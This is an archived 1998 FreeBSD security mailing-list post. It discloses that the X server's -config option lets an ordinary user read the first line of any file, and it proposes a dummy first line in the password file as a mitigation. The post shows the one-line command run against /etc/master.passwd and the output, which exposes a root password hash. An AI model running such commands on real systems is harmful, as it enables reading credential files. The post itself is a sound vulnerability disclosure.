tech-security: X allows ordinary user to read first line of any file

Subject: X allows ordinary user to read first line of any file
To: None <security@FreeBSD.ORG>
From: Darren Reed <avalon@coombs.anu.edu.au>
List: tech-security
Date: 10/17/1998 16:16:33

found this on http://www.hoobie.net/security/exploits/

joeuser@host$ X -config /etc/master.passwd
Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
use: X [:<display>] [option]
.
.
.

I'm sure there's other files where this can be a problem, but in the case
of the password file it seems wise to have a dummy entry as the first line
of the master.passwd file.


Andrew McNaughton








To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message